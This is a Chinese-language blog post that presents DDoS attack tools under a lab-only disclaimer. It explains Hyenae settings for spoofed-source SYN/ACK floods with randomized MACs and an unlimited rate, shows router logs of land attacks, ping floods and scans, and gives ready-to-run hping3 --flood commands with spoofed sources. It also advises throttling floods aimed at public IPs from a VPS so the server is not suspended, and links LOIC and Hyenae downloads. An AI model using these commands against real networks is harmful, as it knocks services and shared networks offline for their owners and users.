實用的DDos攻擊工具

 來源： http://www.safecdn.cn/linux/2018/12/ddos/95.html ‎

特別提示：僅用於攻防演練及教學測試用途，禁止非法使用

Hyenae

是在windows平臺上很是好用的一款ddos攻擊工具，能夠完成絕大多數的攻擊操做。

download

• https://sourceforge.net/projects/hyenae/

Features

• ARP-Request flooding
• ARP-Cache poisoning
• PPPoE session initiation flooding
• Blind PPPoE session termination
• ICMP-Echo flooding
• ICMP-Smurf attack
• ICMP based TCP-Connection reset
• TCP-SYN flooding
• TCP-Land attack
• Blind TCP-Connection reset
• UDP flooding
• DNS-Query flooding
• DHCP-Discover flooding
• DHCP starvation attack
• DHCP-Release forcing
• Cisco HSRP active router hijacking
• Pattern based packet address configuration
• Intelligent address and address protocol detection
• Smart wildcard-based randomization
• Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

鬣狗界面

hyenae的界面比較簡單，圖中展現的是SYN/ACK洪泛攻擊的配置選項。

• operation mode中能夠選擇網卡

• Network Protocol中能夠選擇攻擊方式對應的網絡協議，如SYN洪泛攻擊對應傳輸層的TCP，IP協議可選IPv4, IPv6

• 攻擊源的IP,MAC地址以及端口號能夠很是靈活的設置，按MAC-IP@port的格式書寫，如圖中的攻擊源匹配模式%-172.17.14.158@80
  • % 表明任意，在此處表明任意的MAC地址
  • 172.17.14.158爲僞造的攻擊源IP，能夠修改成任意的合法IP
  • 80爲端口號，80同時也是網絡服務器的默認端口

• 攻擊目標的設置方式與攻擊源一致，圖中的%-172.17.14.10@80
  • % 隨機生成MAC地址
  • 172.17.14.10表明被攻擊的IP
  • 80爲攻擊目標的被攻擊端口號

• 針對TCP協議，右側給出其對應的5個常見flags: FIN, SYN, RST, PSH, ACK
  • 能夠隨意進行單選或多選，以實現不一樣的攻擊方式
  • 隨意的組合能夠產生正常通訊過程當中沒法出現的數據包

• 軟件下方能夠設置數據包的發送速率，默認爲無限速發送，這會暫用大量帶寬，致使網絡擁塞；固然啦，這個軟件本就是爲了攻擊網絡，致使網絡癱瘓正是其目的所在

• 選擇不一樣的攻擊方式，會顯示相應不一樣的配置選項

簡單說，這幅圖的做用是產生MAC地址隨機，IP爲172.17.14.158，端口爲80的僞造源，去攻擊目的MAC隨機，IP爲172.17.14.10的web server。

因爲目的MAC隨機，當MAC地址首字節爲奇數時，生成的數據包爲廣播包，此時將產生廣播風暴，局域網內的全部設備都將收到大量的廣播包，當速率很高時，很容易致使局域網癱瘓，這是須要注意的。本人當時年少輕狂，有次測試，使用全速率的廣播式SYN/ACK攻擊，直接致使部門的局域網癱瘓斷網，幸虧是晚上，後來找人重置了部門內的網絡設備才恢復，想一想真是罪過啊。

Use cases

• Land Attack
  • src: %-172.17.14.94@53
  • des: %-172.17.14.94@80

1 2 3 4

DoS *** 3118 *** {Land Attack} are suppressed! [DoS Attack: Land Attack] from source: 172.17.14.94, port 53, [DoS Attack: Land Attack] from source: 172.17.14.94, port 53, [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,

• SYN/ACK scan (TCP SYN ACK)
  • src: %-172.17.14.8@80
  • des: %-172.17.14.94@80

1 2 3 4

DoS *** 3896 *** {SYN/ACK Scan} are suppressed! [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,

• ping flood (icmp echo)
  • src: %-172.17.14.8
  • des: %-172.17.14.94

1 2 3 4

DoS *** 1881 *** {Ping Flood} are suppressed! [DoS Attack: Ping Flood] from source: 172.17.14.8, [DoS Attack: Ping Flood] from source: 172.17.14.8, [DoS Attack: Ping Flood] from source: 172.17.14.8,

• ping sweep (icmp echo)
  • src: %-%
  • des: %-%

1 2 3 4

DoS *** 1719 *** {Ping Sweep} are suppressed! [DoS Attack: Ping Sweep] from source: 188.167.1.1, [DoS Attack: Ping Sweep] from source: 113.172.1.5, [DoS Attack: Ping Sweep] from source: 175.181.2.6,

• RST Scan(TCP RST)
  • src: %-172.17.14.8@80
  • des: %-172.17.14.94@80

1 2 3 4

DoS *** 4023 *** {RST Scan} are suppressed! [DoS Attack: RST Scan] from source: 172.17.14.8, port 80, [DoS Attack: RST Scan] from source: 172.17.14.8, port 80, [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,

• ACK scan (TCP ACK)
  • src: %-172.17.14.8@80
  • des: %-172.17.14.94@80

1 2 3 4

DoS *** 3989 *** {ACK Scan} are suppressed! [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80

• FIN scan(TCP FIN)
  • src: %-172.17.14.8@80
  • des: %-172.17.14.94@80

1 2 3 4

DoS *** 3009 *** {FIN Scan} are suppressed! [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80, [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80, [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

 

hping3

用於生成和解析TCPIP協議數據包的開源工具

hping3一樣可用於產生ddos攻擊包，但與hyenae不一樣的是，hping3沒法手動設置MAC地址，而是根據IP地址自動獲取

須要注意的是，若是使用搬瓦工購買的vps向公網IP執行hping3攻擊的話，最好不要嘗試，若是要用也必定記得限速，不然就會被警告並關停,固然你有3次機會重置

vps警告

examples

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

# land attack $ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52 # syn/ack attack $ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52 # -V verbose # -c packet count # -d data size # -p destPort # -s srcPort # -a srcIP # -S SYN tag # -A ACK tag # -w winsize # -I interface

reference

• 網絡攻擊工具
  • hping3
    • http://man.linuxde.net/hping3
    • http://0daysecurity.com/articles/hping3_examples.html
  • LOIC
  •        http://sourceforge.net/projects/loic/
  • hyenae
    • https://sourceforge.net/projects/hyenae/
  • 免費DDOS攻擊測試工具大合集 http://www.freebuf.com/sectool/36545.html

• ddos攻擊說明
  • https://security.radware.com/ddos-knowledge-center/ddospedia/syn-flood/
  • 網絡攻擊：半鏈接攻擊(SYN攻擊)、全鏈接攻擊、RST攻擊、IP欺騙、DNS欺騙、DOS/DDOS攻擊 http://blog.csdn.net/guowenyan001/article/details/11777361